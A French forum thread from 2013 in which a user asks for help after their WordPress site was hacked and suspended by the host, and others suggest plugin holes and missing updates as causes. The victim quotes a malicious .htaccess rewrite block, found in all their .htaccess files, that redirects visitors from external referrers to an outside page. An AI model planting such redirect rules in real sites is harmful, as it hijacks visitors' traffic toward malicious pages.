CONNEXION
  • RetourJeux
    • Sorties
    • Hit Parade
    • Les + populaires
    • Les + attendus
    • Soluces
    • Tous les Jeux
    • Gaming
  • RetourActu Gaming
    • News
    • Astuces
    • Tests
    • Previews
    • Toute l'actu gaming
  • RetourBons plans
    • Bons plans
    • Bons plans Smartphone
    • Bons plans Hardware
    • Bons plans Image et Son
    • Bons plans Amazon
    • Bons plans Cdiscount
    • Bons plans Decathlon
    • Bons plans Fnac
    • Tous les Bons plans
  • RetourJVTech
    • Actus High-Tech
    • Intelligence Artificielle
    • Smartphones
    • Mobilité urbaine
    • Hardware
    • Image et son
    • Tutoriels
    • Tests produits High-Tech
    • Guides d'achat High-Tech
    • JVTech
  • RetourCulture
    • Actus Culture
    • Culture
  • RetourVidéos
    • A la une
    • Gaming Live
    • Vidéos Tests
    • Vidéos Previews
    • Gameplay
    • Trailers
    • Chroniques
    • Replay Web TV
    • Toutes les vidéos
  • RetourForums
    • Hardware PC
    • PS5
    • Switch 2
    • Xbox Series
    • Switch
    • Pokemon pocket
    • FC 25 Ultimate Team
    • League of Legends
    • Tous les Forums
  • PC
  • PS5
  • Xbox Series
  • Switch 2
  • PS4
  • One
  • Switch
  • iOS
  • Android
  • MMO
  • RPG
  • FPS
En ce moment Genshin Impact Valhalla Breath of the wild Animal Crossing GTA 5 Red dead 2
Liste des sujets

[ Hack ] Mon site wordpress hacké

vico83
vico83
Niveau 8
01 février 2013 à 14:19:02

Bonjour à tous, j'ai mon site depuis un petit moment ( la-thailande.net ) et quand je me connecte on me dit : 'This site has been temporarily disabled, please try again later.'. Je ne peut pas me connecter avec /wp-admin ni avec le ftp. J'ai contacter le service client de mon hebergeur ( one.com ) et il ma dit que mon site a étais hacké. Ils vont m'envoyer un email mais pas avant 18heures . Que faire ? Merci.

ParaPlayGeek
ParaPlayGeek
Niveau 7
01 février 2013 à 14:54:43

Attendre le mail :-( ?

vico83
vico83
Niveau 8
01 février 2013 à 15:04:18

C'est long :(

Fire_Storm
Fire_Storm
Niveau 10
01 février 2013 à 15:59:50

Hacké ç'est à dire ? (enfin je sais ce que ça veut dire hein mais on t'a pas donné la "raison" du hack ? (envoi de spam, intrusion dans la base de données, XSS ou autre quoi, ça donne déjà une idée du trou qu'il faut boucher)

Quelle version de wordpress ? Je suppose que tu utilisais des plugins, lesquelles ?

vava740
vava740
Niveau 10
01 février 2013 à 16:32:27

Je connais un gars qui avait eu un problème similaire sur son WordPress, à cause d'un plugin qui contenait une faille d'upload, un script PHP avait été uploadé et était utilisé pour flooder d'autres sites de requêtes HTTP...

L'hébergement avait aussi été suspendu, mais après avoir envoyé un mail, l'hébergeur a supprimé le script qui posait problème et a rétabli l'hébergement.

Quoi qu'il en soit ne sois pas trop pressé, il me semble que ça avait pris un week-end entier avant d'avoir le site à nouveau OP.

Pseudo supprimé
Pseudo supprimé 01 février 2013 à 17:16:29

Je comprends pas comment des scripts non-sécurisés peuvent être mis à disposition,
Un ami avait tout son site sur Joomla, un script d'upload sale lui à couté une après midi de nettoyage sur son serveur. :noel:

vico83
vico83
Niveau 8
01 février 2013 à 18:43:13

La toutes dernière version de wordpress, avec, de tête, les plugins Wysija, plugin pour les formulaires, pour le livre d'or, pour les sondages après je me rapel plus ..
Et non on ne mas pas dit on ma dit votre site à étais hacké.

Fire_Storm
Fire_Storm
Niveau 10
01 février 2013 à 22:54:11

Il suffit d'un petit trou, d'un truc qu'on a oublié de vérifier et e mal est fait.

La sécurité c'est un métier redondant et pas égalitaire du tout; si de ton coté il y a 1000 trous, il faudra boucher les 1000 trous alors que pour le pirate 1 seul suffit.

Alors oui des fois on voit bien que le developpeur a un cruel manque de connaissances, et parfois c'est un malheureux oubli mais qui coute très cher.

Pseudo supprimé
Pseudo supprimé 02 février 2013 à 00:08:35

Ouais enfin j'me souviens avoir vu des trucs vraiment pas jolis sur des modules Joomla,
Raison de plus pour que j'utilise jamais leurs trucs à moins de vérifier tout le code.
:doute:

Maaagg
Maaagg
Niveau 6
02 février 2013 à 12:15:16

Tu mettais bien à jour ton site ?

Avec Wordpress à partir du moment où tu laisses ton site sans mise à jour, tu as une grande chance de te faire hack

thebrickforce
thebrickforce
Niveau 1
03 février 2013 à 19:18:01

Le hacker a dû utiliser cette méthode : https://image.noelshack.com/fichiers/2013/05/1359915449-faking.gif

42_____________
42_____________
Niveau 4
03 février 2013 à 22:00:40

What is this, a gif for ants ? :hap:

vico83
vico83
Niveau 8
06 février 2013 à 16:44:54

Donc j'ai plus d'infos, je regarde dans un .htaccess et je vois : <IfModule mod_rewrite.c>

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

RewriteRule ^.*$ http://gabriellerosephotography.com/enas.html?h=1527683 [L,R]

</IfModule>

Donc comment faire pour bloquer ce site ? Le dénoncé ou autre ?

vico83
vico83
Niveau 8
06 février 2013 à 16:47:23

Et sur tout les htaccess qu'il y a il y a ce code.

Mais comment font il pour mettre quelque chose dans mon ftp alors qu'il n'on pas d'infos ?

Tiddo
Tiddo
Niveau 10
06 février 2013 à 18:40:45

Vire les règles de réécriture ? :(

Tu es chez quel hébergeur ?

vico83
vico83
Niveau 8
06 février 2013 à 19:12:45

One.com

Sous forums
  • Aide à l'achat Mac
  • Création de sites web
  • Création de Jeux
  • Linux
  • Programmation
  • Internet
  • Steam Deck
  • Macintosh
  • Hardware
La vidéo du moment